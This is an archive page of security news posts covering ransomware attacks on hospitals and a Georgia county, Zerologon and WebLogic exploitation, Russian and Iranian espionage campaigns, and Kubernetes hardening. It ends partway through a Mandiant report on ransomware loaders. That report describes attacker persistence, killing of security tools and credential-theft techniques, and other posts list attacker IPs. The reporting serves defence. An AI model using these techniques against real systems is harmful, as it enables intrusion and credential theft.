Category Archives: Malware

Halloween News Wrap: The Election, Hospital Deaths and Other Scary Cyberattack Stories

Threatpost breaks down the scariest stories of the week ended Oct. 30 haunting the security industry -- including bugs that just won't die.

5 Components of the Kubernetes Control Plane that Demand Special Attention in Your Security Strategy

Organizations and security incidents in Kubernetes environments, these are 5 key components of the control plane that demand special attention

Organizations are no strangers to security incidents in their Kubernetes environments. In its State of Container and Kubernetes Security Fall 2020 survey, StackRox found that 90% of respondents had suffered a security incident in their Kubernetes deployments in the last year. Two-thirds of respondents explained that they had weathered a misconfiguration incident, followed by vulnerability cases, runtime events and failed audits at 22%, 17% and 16%, respectively.

Misconfiguration incidents are so prolific because they can appear in many different aspects of an organization’s Kubernetes environment. For instance, they can affect the Kubernetes control plane. This section of a Kubernetes deployment is responsible for making global decisions about a cluster as well as for detecting and responding to events affecting the cluster, notes Kubernetes.

This raises an important question: how can organizations harden the Kubernetes control plane against digital attacks?

To answer that question, this blog post will discuss five components within the Kubernetes control plane that require special attention within organizations’ security strategy. These are the kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager. It will then provide recommendations on how organizations can secure each of these components.

kube-apiserver

What it is

Per Kubernetes’ documentation, kube-apiserver is the front end for the Kubernetes control plane. It functions as the main implementation of a Kubernetes API server. Organizations can scale kube-apiserver horizontally by deploying more instances.

Why it needs to be secured

The Container Journal noted that attackers are committed to scanning the web for publicly accessible API servers. Acknowledging that reality, organizations need to make sure they don’t leave their kube-apiserver instances publicly exposed. If they do, they could provide attackers with an opening for compromising a Kubernetes cluster.

How to secure it

Administrators can follow the Container Journal’s advice by configuring their API servers to allow cluster API access only via the internal network or a corporate VPN. Once they’ve implemented that security measure, they can use RBAC authorization to further limit who has access to the cluster. They can enable this feature specifically via the kube-apiserver.

etcd

What it is

Kubernetes uses etcd as key value backing store for cluster data. In order to use etcd, organizations need to have a backup plan for the highly sensitive configuration data that they’d like to protect with this store.

Why it needs to be secured

As with kube-apiserver, organizations might accidentally leave etcd exposed to the Internet. The New Stack covered the work of one software developer who conducted a search on Shodan to look for exposed etcd servers. This investigation uncovered 2,284 etcd servers that malicious actors could access through the Internet.

How to secure it

Kubernetes notes in its cluster administration resources that etcd is equivalent to root permission in the cluster. In response, administrators should grant permission to only the nodes that require access to etcd clusters. They should also use firewall rules as well as the feature’s inherent security features, notably peer.key/peer.cert and client.key/client.cert, to secure communications between etcd members as well as between etcd and its clients.

kube-scheduler

What it is

The kube-scheduler is a component within the control plane that watches for the creation of new pods with no assigned node. If it detects such a pod, it selects a node for them to run on. It makes these decisions by taking individual and collective resource requirements, data locality and other considerations into consideration, per Kubernetes’ website.

Why it needs to be secured

Any compromise involving the kube-scheduler could affect the performance and availability of a cluster’s pods, explains Packt. Such an event could thereby cause disruptions in an organization’s Kubernetes environment that undermines business productivity.

How to secure it

Administrators can follow Packt’s advise to secure the kube-scheduler by disabling profiling, a feature which exposes system details. They can do this by setting the “–profiling” setting to “false.” Additionally, they can disable external connections to kube-scheduler using the “AllowExtTrafficLocalEndpoints” configuration to prevent outside attackers from gaining access to this control plane component.

kube-controller-manager

What it is

This particular component lives up to its name in that it runs controller processes. Each of those processes, including those run by the node controller, replication controller and others, are separate processes. However, the kube-controller-manager compiles all of those processes and runs them together.

Why it needs to be secured

A security issue in the kube-controller-manager could negatively affect the scalability and resilience of applications that are running in the cluster. Such an event could thus have an effect on the organization’s business.

How to secure it

Organizations can secure the kube-controller-manager by monitoring the number of instances that they have of this feature deployed in their environments. They can also follow the recommendations that StackRox made in September 2020 by restricting the feature’s file permissions, configuring to serve only HTTPs, binding it to a localhost interfact and using Kubernetes RBAC to allow access to individual service accounts per controller.

cloud-controller-manager  

What is it?

Last but not least, the cloud-controller-manager enables administrators to link their cluster into their Cloud Service Provider’s (CSP’s) API. They can then use that feature to separate out elements that interact with the CSP’s cloud platform from those that interact with the cluster. Per Kubernetes’ documentation, cloud-controller-manager functions similarly to kube-controller-manager in its ability to compile multiple processes into one. The difference is that the cloud-controller-manager runs controllers that are specific to an organization’s CSP only.

Why it needs to be secured

Issues involving the cloud-controller-manager pose a similar threat to organizations as those that affect the kube-controller-manager.

How to secure it

Acknowledging the similarities between kube-controller-managers and cloud-controller-managers, organizations can use the same measures to secure both.

The Security Work Doesn’t End There

The five control plane components discussed above all demand attention as part of an organization’s overall Kubernetes security efforts. Even so, organizations’ work to secure their Kubernetes architecture doesn’t end there. There are also the Node components.

For information on how to secure that part of a Kubernetes cluster, click here.

About the Author: David Bisson is an information security writer and security junkie. He’s a contributing editor to IBM’s Security Intelligence, Tripwire’s The State of Security Blog, and a contributing writer to Bora. He also regularly produces written content for Zix and a number of other companies in the digital security space.

Pierluigi Paganini

(SecurityAffairs – hacking, Kubernetes)

The post 5 Components of the Kubernetes Control Plane that Demand Special Attention in Your Security Strategy appeared first on Security Affairs.

DoppelPaymer ransomware gang leaked Hall County, Georgia, voter info

The DoppelPaymer ransomware operators have released data that was stolen from Hall County, Georgia earlier this month.

The DoppelPaymer ransomware operators have published online data that was stolen from Hall County, Georgia earlier this month.

The attack took place on October 7, it hit Hall County, in the northern part of the state and it disabled the county’s voter signature database.

The ransomware attack hit a Georgia county government and disabled a database used to verify voter signatures in the authentication of absentee ballots. It is a common process to validate absentee ballots sent by mail by analyzing signatures.

The media pointed out that this is the first reported case of a ransomware attack against a system used in the incoming 2020 Presidential election.

Ransomware attacks could have a dramatic impact on the elections, they could disrupt voting systems and raise doubts about the validity of the vote.

While the media reported that the ransomware operators leaked stolen data on their dark web leak site to force the organization to pay the ransom, Hall County stated that there was no indication that the hackers stole any unencrypted data before encrypting the systems.

“At this time, there is no evidence to show that citizen or employee data has been compromised. However, citizens and employees are encouraged to take precautionary measures to monitor and protect their personal information,” Hall County stated.

The DoppelPaymer ransomware gang finally published over 1 GB of files stolen from Hall County systems and revealed that 2,464 devices were encrypted during the attack.

DoppelPaymer ransomware Hall County
Source Bleeping Computer

According to Bleeping Computer, The dump includes election documents, lobby comment cards, 911 spreadsheets, accounting and financial records.

“The election documents reviewed by BleepingComputer contain ballot proofs, poll worker lists, administrative documents, accounting and financial records, and city bulletins.” reported Bleeping Computer. “Also included are voter registration records containing resident’s voter registration ID, full name, address, and assigned ballot, which is, for the most part, public information.”

Most of the information leaked is public, but can be exploited by threat actors to carry out malicious activities against voters.

Recently the US government revealed that Iran-linked hackers were behind voter intimidation emails that were sent to Democrats in Florida and Alaska that pretended to be from the far-right Proud Boys group.

Pierluigi Paganini

(SecurityAffairs – DoppelPaymer ransomware, Hall County)

The post DoppelPaymer ransomware gang leaked Hall County, Georgia, voter info appeared first on Security Affairs.

Brooklyn & Vermont US hospitals hit by ransomware attacks

Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network are the last victims of the Ryuk ransomware operators.

Ryuk ransomware operators continue the target the US healthcare industry, the last victims in order of time are the Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network.

The news of the attack comes a few hours after The FBI, the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) have issuedjoint alert to warn hospitals and healthcare providers of imminent ransomware attacks from Russia.

This security advisory describes the tactics, techniques, and procedures (TTPs) associated with cyber criminals that could target organizations in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware.

The government agencies receive information about imminent attacks, threat actors are using the TrickBot botnet to deliver the infamous ransomware to the infected systems.

This week, the systems at Sky Lakes Medical Center in Oregon and St. Lawrence Health System in New York were infected with the Ryuk ransomware. In September, the Ryuk ransomware gang hit Universal Health Services, one of the largest hospital and healthcare services providers, forcing the company to shut down systems at healthcare facilities in the United States. The incident impacted over 200 medical facilities nationwide.

The news of the Ryuk ransomware attack at the Wycoff hospital was first published by Bleeping Computer that was informed by an employee of the organization.

Wyckoff Heights Medical Center is a 350-bed teaching hospital located in an ethnically diverse residential neighborhood directly on the border of northern Brooklyn and Western Queens, NY.

Wyckoff Hospital shut down portions of its network as part of the incident response procedure.

At the time of publishing this post, it is not known the extent of the incident and the impact on the operations of the hospitals.

University of Vermont Health Network also disclosed a similar cyber attack, the organization is working with the FBI and the Vermont Department of Public Safety on the investigation.

“People who are in urgent need of care are getting it and most appointments are happening,” Dr. Stephen Leffler, president of the University of Vermont Medical Center in Burlington, said at a news conference late Thursday outside the hospital. “Most surgeries will happen tomorrow. We did slow some down today as were switching systems.”

The ransomware attack has caused variable impacts at each of our affiliates, the family of ransomware involved in the attack is yet to be revealed.

“The attack has caused variable impacts at each of our affiliates. Staff are continuing to follow well-practiced standby procedures to ensure safe patient care. We understand the difficulty this causes for our patients and the community and apologize for the impact. There have been some changes to patient appointments and we are attempting to reach those patients who have been affected. We will continue to provide systems and patient service updates when they are available,” read a statement from the University of Vermont Health Network.

According to researchers at CheckPoint, Healthcare is the most targeted industry, by ransomware, in the US in October. Ransomware attacks against the US healthcare sector increased by 71%, experts also reported an increase of 33% in APAC and 36% in EMEA.

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post Brooklyn & Vermont US hospitals hit by ransomware attacks appeared first on Security Affairs.

Threat actors are actively exploiting Zerologon flaw, Microsoft warns

Microsoft researchers are warning that threat actors are continuing to actively exploit the ZeroLogon vulnerability in attacks in the wild.

Microsoft is warning that threat actors are actively exploiting the ZeroLogon vulnerability in the Netlogon Remote Protocol.

The CVE-2020-1472 flaw is an elevation of privilege that resides in the Netlogon. The Netlogon service is an Authentication Mechanism used in the Windows Client Authentication Architecture which verifies logon requests, and it registers, authenticates, and locates Domain Controllers.

An attacker could exploit the vulnerability to impersonate any computer, including the domain controller itself, and execute remote procedure calls on their behalf.

An attacker could also exploit the flaw to disable security features in the Netlogon authentication process and change a computer’s password on the domain controller’s Active Directory.

“Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020.” reads a post published by MSRC VP of Engineering Aanchal Gupta. “If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be used to steal domain credentials and take over the domain.”

Microsoft strongly encourages administrators of enterprise Windows Servers to install the August 2020 Patch Tuesday as soon as possible to protect their systems from Zerologon attack that exploits the CVE-2020-1472.

Because the initial documentation regarding Zerologon patching process was not clear enough, Microsoft provided the following updates:

  1. UPDATE your Domain Controllers with an update released August 11, 2020 or later.
  2. FIND which devices are making vulnerable connections by monitoring event logs.
  3. ADDRESS non-compliant devices making vulnerable connections.
  4. ENABLE enforcement mode to address CVE-2020-1472 in your environment.

At the end of September, Microsoft issued a similar warning. The IT giant published a series of Tweets to warn of attackers that are actively exploiting the Windows Server Zerologon in attacks in the wild. The IT giant urged Windows administrators to install the released security updates as soon as possible.

In early October, Microsoft spotted a series of Zerologon attacks allegedly launched by the Russian cybercrime group tracked as TA505, CHIMBORAZO and Evil Corp.

Microsoft experts spotted the Zerologon attacks involving fake software updates, the researchers noticed that the malicious code connected to command and control (C&C) infrastructure known to be associated with TA505.

In the same period, Microsoft published a post and a series of tweets to warn of cyber attacks exploiting the Zerologon vulnerability carried out by the Iran-linked APT group known as MuddyWater, aka Mercury.

On September 18, The Department of Homeland Security’s CISA issued an emergency directive to order government agencies to address the Zerologon vulnerability (CVE-2020-1472) by September 21.

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post Threat actors are actively exploiting Zerologon flaw, Microsoft warns appeared first on Security Affairs.

US hospitals warned of threat of imminent ransomware attack

US hospitals and healthcare providers have been warned that there is evidence of a credible and imminent threat that they will be targeted by ransomware. In an alert jointly released by the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS), the agencies reveal that it has "credible information of an increased and imminent cybercrime threat to US hospitals and healthcare providers." Read more in my article on the Bitdefender Business Insights blog.

US Cyber Command details implants used in attacks on parliaments and embassies

US Cyber Command published technical details on malware implants used by Russia-linked APTs on multiple parliaments, embassies

US Cyber Command shared technical details about malware implants employed by Russian hacking groups in attacks against multiple ministries of foreign affairs, national parliaments, and embassies.

Experts from the US Cyber Command’s Cyber National Mission Force (CNMF) unit and the Cybersecurity and Infrastructure Security Agency (CISA) uploaded the samples on the Virus Total online virus scan platform.

CISA also published two joint advisories with the FBI and CNMF that provides info regarding the ComRAT and Zebrocy malware that were used by Russia-linked APT groups, including the APT28 and Turla.

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTONhas been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, NASA and the US Central Command.

“FBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.” reads the advisory published CISA.

Russia-linked cyberespionage groups utilized the Zebrocy backdoor in attacks aimed at embassies and ministries of foreign affairs from Eastern Europe and Central Asia.

“Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is designed to allow a remote operator to perform various functions on the compromised system.” reads the CISA’s advisory.

Zebrocy is known to be a malware of the APT28’s arsenal, a Russia linked APT group working under the control of the Russian Main Intelligence Directorate (GRU).

Pierluigi Paganini

(SecurityAffairs – hacking, US Cyber Command)

The post US Cyber Command details implants used in attacks on parliaments and embassies appeared first on Security Affairs.

FBI, CISA alert warns of imminent ransomware attacks on healthcare sector

FBI and the DHS’s CISA agencies published a joint alert to warn hospitals and healthcare providers of imminent ransomware attacks from Russia.

The FBI, the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) has issued a joint alert to warn hospitals and healthcare providers of imminent ransomware attacks from Russia.

This security advisory describes the tactics, techniques, and procedures (TTPs) associated with cyber criminals that could target organizations in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware.

The government agencies receive information about imminent attacks, threat actors are using the TrickBot botnet to deliver the infamous ransomware to the infected systems.

“CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.” reads the alert.

TrickBot is a popular banking Trojan that has been around since October 2016, its authors have continuously upgraded it by implementing new features.

Ryuk ransomware

In early 2019, researchers spotted a new TrickBot backdoor framework dubbed Anchor that was using the anchor_dns tool for abusing the DNS protocol for C2 communications.

Several groups of experts linked both TrickBot and Ryuk threats to cybercrime gangs operating out of Russia. Ryuk first appeared in the threat landscape in August 2018 as a derivative of the Hermes 2.1 ransomware, that was first spotted in late 2017 and was available for sale on the open market as of August 2018

Unlike other ransomware gangs, Ryuk ransomware operators did not announce to avoid targeting healthcare organizations during the COVID-19

A few weeks ago, Universal Health Services (UHS), one of the largest hospital and healthcare services providers, has shut down systems at healthcare facilities in the United States after they were infected with the Ryuk ransomware.

A few days ago, Microsoft’s Defender team, FS-ISACESETLumen’s Black Lotus LabsNTT, and Broadcom’s cyber-security division Symantec joined the forces and announced a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.

Microsoft has taken down 120 of the 128 servers that were composing the Trickbot infrastructure.

Microsoft announced to have taken down 62 of the original 69 TrickBot C&C servers, seven servers that could not be brought down last week were Internet of Things (IoT) devices.

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post FBI, CISA alert warns of imminent ransomware attacks on healthcare sector appeared first on Security Affairs.

Critical Oracle WebLogic flaw CVE-2020-14882 actively exploited in the wild

Threat actors have started exploiting a critical vulnerability in Oracle WebLogin, tracked as CVE-2020-14882, in attacks in the wild.

Threat actors have started scanning the Internet for servers running vulnerable installs of Oracle WebLogic in the attempt of exploiting the a critical flaw tracked as CVE-2020-14882.

The CVE-2020-14882 can be exploited by unauthenticated attackers to take over the system by sending a simple HTTP GET request.

The vulnerability received a severity rating 9.8 out of 10, it was addressed by Oracle in this month’s release of Critical Patch Update (CPU).

The vulnerability affects versions of Oracle WebLogic Server are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.

The flaw was discovered by the security researcher Voidfyoo from Chaitin Security Research Lab.

Security researchers from SANS Technology Institute set up a collection of honeypots set up allowed the researchers to catch a series of attacks shortly after the exploit code for CVE-2020-14882 was publicly available.

According to Johannes Ullrich, Dean of Research at SANS, the attacks that targeted the honeypots were originated from the following IP addresses:

  • 114.243.211.182 – assigned to China Unicom
  • 139.162.33.228 – assigned to Linode (U.S.A.)
  • 185.225.19.240 – assigned to MivoCloud (Moldova)
  • 84.17.37.239 – assigned to DataCamp Ltd (Hong Kong)

According to the SANS expert, the exploit employed in the attacks appears to be based on the code published in this blog post by the researcher Jang.

“These exploit attempts are right now just verifying if the system is vulnerable. Our honeypots (up to now) do not return the “correct” response, and we have not seen follow-up requests yet.” reads the post published by SANS.

SANS Institute is alerting the internet service providers operating the IP addresses involved in the attacks.

The exploit used by the attackers only probe the systems to determine if they are vulnerable.

Searching on Spyse engine for Oracle WebLogic servers exposed online end potentially vulnerable to CVE-2020-14882 we can retrieve more than 3,000 installs.

Administrators of Oracle WebLogic installs have to apply the patch for the CVE-2020-14882 vulnerability as soon as possible.

Pierluigi Paganini

(SecurityAffairs – hacking, Oracle WebLogic)

The post Critical Oracle WebLogic flaw CVE-2020-14882 actively exploited in the wild appeared first on Security Affairs.

Russia-linked Turla APT hacked European government organization

Russia-linked APT Turla has hacked into the systems of an undisclosed European government organization according to Accenture.

According to a report published by Accenture Cyber Threat Intelligence (ACTI), Russia-linked cyber-espionage group Turla has hacked into the systems of an undisclosed European government organization.

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

The attack against the undisclosed European government organization is in line with the APT’s espionage motivation, the attacker utilized a combination of remote procedure call (RPC)-based backdoors, such as HyperStack and remote administration trojans (RATs), such as Kazuar and Carbon. ACTI researchers observed the attacks between June and October 2020. 

“Notably, Accenture researchers recently identified novel command and control (C&C) configurations for Turla’s Carbon and Kazuar backdoors on the same victim network.” reads the report published by Accenture. “The Kazuar instances varied in configuration between using external C&C nodes off the victim network and internal nodes on the affected network, and the Carbon instance had been updated to include a Pastebin project to receive encrypted tasks alongside its traditional HTTP C&C infrastructure.”

HyperStack is one of several RPC backdoors in the Turla’s arsenal that was first observed in 2018, it is a custom implant developed by the ATP group.

HyperStack leverages named pipes to execute remote procedure calls (RPC) from the command end control to the device running the HyperStack client. Lateral movements are implemented attempting to connect to another remote device’s IPC$ share, either using a null session or default credentials.

“IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant’s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device.” continues the report.

Turla uses a variety of command and control (C&C) implementations for each compromise in an attempt to be resilient to countermeasures implemented by the defenders. The Russia-linked APT group has relied on bot compromised web servers as C&C and legitimate web services like Pastebin as C2. One of the Kazuar sample analyzed by the experts was configured to receive commands sent through likely internal nodes in the government’s network.

Turla continues to extensively use the modular Carbon backdoor framework with advanced peer-to-peer capability. One of the Carbon backdoor analyzed by the researchers used the traditional threat actor-owned C&C infrastructure with tasks served from Pastebin. ACTI analysts discovered a Carbon installer that dropped a Carbon Orchestrator, two communication modules, and an encrypted configuration file.

ACTI also shared Indicators of Compromise (IoCs) for this attack to allow Government entities to check for evidence of compromise within their networks.

“Turla will likely continue to use its legacy tools, albeit with upgrades, to compromise and maintain long-term access to its victims because these tools have proven successful against Windows-based networks,” concludes Accenture.

Pierluigi Paganini

(SecurityAffairs – hacking, Turla)

The post Russia-linked Turla APT hacked European government organization appeared first on Security Affairs.

Iran-linked Phosphorous APT hacked emails of security conference attendees

Iran-linked APT group Phosphorus successfully hacked into the email accounts of multiple high-profile individuals and security conference attendees.

Microsoft revealed that Iran-linked APT Phosphorus (aka APT35Charming KittenNewscaster, and Ajax Security Team) successfully hacked into the email accounts of multiple high-profile individuals and attendees at this year’s Munich Security Conference and the Think 20 (T20) summit.

“Today, we’re sharing that we have detected and worked to stop a series of cyberattacks from the threat actor Phosphorous masquerading as conference organizers to target more than 100 high-profile individuals.” reads the post published by Microsoft. “Phosphorus, an Iranian actor, has targeted with this scheme potential attendees of the upcoming Munich Security Conference and the Think 20 (T20) Summit in Saudi Arabia.”

Nation-state actors successfully targeted over 100 individuals, including former ambassadors and other senior policy experts.

According to the experts at Microsoft Security Intelligence Center, the attacks are part of a cyber-espionage campaign aims at gathering intelligence on the victims by exfiltrating data from their mailboxs and contact list.

Data was exfiltrated to the de-ma[.]online domain, and the g20saudi.000webhostapp[.]com, and ksat20.000webhostapp[.]com subdomains.

The attackers have been sending spoofed email invitations to to former government officials, policy experts, academics, and leaders from non-governmental organizations. Attackers attempted to exploit the fears of travel during the Covid-19 pandemic by offering remote sessions.

The emails were written in almost perfect English.

Experts believe that this campaign is not tied to the upcoming U.S. Presidential elections.

Microsoft experts have worked with conference organizers who are warning their attendees about the ongoing attacks and suggesting them to remain vigilant to this approach being used in connection with other conferences or events.

“We recommend people evaluate the authenticity of emails they receive about major conferences by ensuring that the sender address looks legitimate and that any embedded links redirect to the official conference domain. As always, enabling multi-factor authentication across both business and personal email accounts will successfully thwart most credential harvesting attacks like these.” suggest Microsoft. “For anyone who suspects they may have been a victim of this campaign, we also encourage a close review of email-forwarding rules in accounts to identify and remove any suspicious rules that may have been set during a successful compromise.”

The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. In past campaigns, the APT group launched spear-phishing attacks against activists and journalists focusing on the Middle East, US organizations, and entities located in Israel, the U.K., Saudi Arabia, and Iraq.

Recently Microsoft published a post and a series of tweets to warn of cyber attacks exploiting the Zerologon vulnerability carried out by the Iran-linked APT group known as MuddyWater, aka Mercury.

The IT giant also warned of cyber espionage campaigns carried out by other nation state-sponsored hacking groups operating from Russia and China targeting organizations and individuals involved in this year’s U.S. presidential election.

Pierluigi Paganini

(SecurityAffairs – hacking, Phosphorous)

The post Iran-linked Phosphorous APT hacked emails of security conference attendees appeared first on Security Affairs.

TrickBot operators employ Linux variants in attacks after recent takedown

A few days after the TrickBot takedown, Netscout researchers spotted a new TrickBot Linux variant that was used by its operators.

A few days ago, Microsoft’s Defender team, FS-ISACESETLumen’s Black Lotus LabsNTT, and Broadcom’s cyber-security division Symantec joined the forces and announced a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.

Microsoft has taken down 120 of the 128 servers that were composing the Trickbot infrastructure.

Microsoft announced to have taken down 62 of the original 69 TrickBot C&C servers, seven servers that could not be brought down last week were Internet of Things (IoT) devices.

Microsoft also revealed that operators tried to resume the operations, The company brought down 58 of the 59 servers the operators attempted to bring online after the recent takedown.

According to a new report published by researchers from security firm Netscout, TrickBot’s operators have started to use a new variant of their malware in an attempt to Linux systems and expand the list of its targets.

TrickBot is a popular banking Trojan that has been around since October 2016, its authors have continuously upgraded it by implementing new features.

At the end of 2019, researchers spotted a new TrickBot backdoor framework dubbed Anchor that was using the DNS protocol for C2 communications.

Stage 2 Security researcher Waylon Grange first spotted the new Linux variant of Anchor_DNS in July and called it “Anchor_Linux.”

“The actors behind Trickbot, a high profile banking trojan, have recently developed a Linux port of their new DNS command and control tool known as Anchor_DNS.” explained Grange.

“Often delivered as part of a zip, this malware is a lightweight Linux backdoor. Upon execution it installs itself as a cron job, determines the public IP [address] for the host and then begins to beacon via DNS queries to its C2 server.”

Researchers from Netscout now published an analysis of the variant detailing the communication flow between the bot and the C2 server.

The client sends “c2_command 0” to the server along with information about the compromised system and the bot ID, the server, in turn, responds with the message “signal /1/” back to the bot.

Trickbot Linux

The infected host responds by sending the same message back to the C2, which in turn sends the command to be executed by the bot. Once executed the command, the bot sends the result of the execution to the C2 server.

“The complexity of Anchor’s C2 communication and the payloads that the bot can execute reflect not only a portion of the Trickbot actors’ considerable capabilities, but also their ability to constantly innovate, as evidenced by their move to Linux.” concludes the report. “It is important to note that Trickbot operators aren’t the only adversaries to realize the value of targeting other operation systems”

Pierluigi Paganini

(SecurityAffairs – hacking, Trickbot)

The post TrickBot operators employ Linux variants in attacks after recent takedown appeared first on Security Affairs.

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

Email Campaign TTPs

Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

  • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
  • This document contains an in-line link to a URL hosting a malware payload.
  • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
  • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

  • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
  • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
  • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
  • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


Figure 1: Email containing internal references to target an organization’s name


Figure 2: Google Docs PDF document containing a target organization’s logo

Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

Post-Compromise TTPs

Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

Establish Foothold

Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

Maintain Presence

Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

  • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
  • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
  • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
  • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
  • In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

Escalate Privileges

The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

  • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
  • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
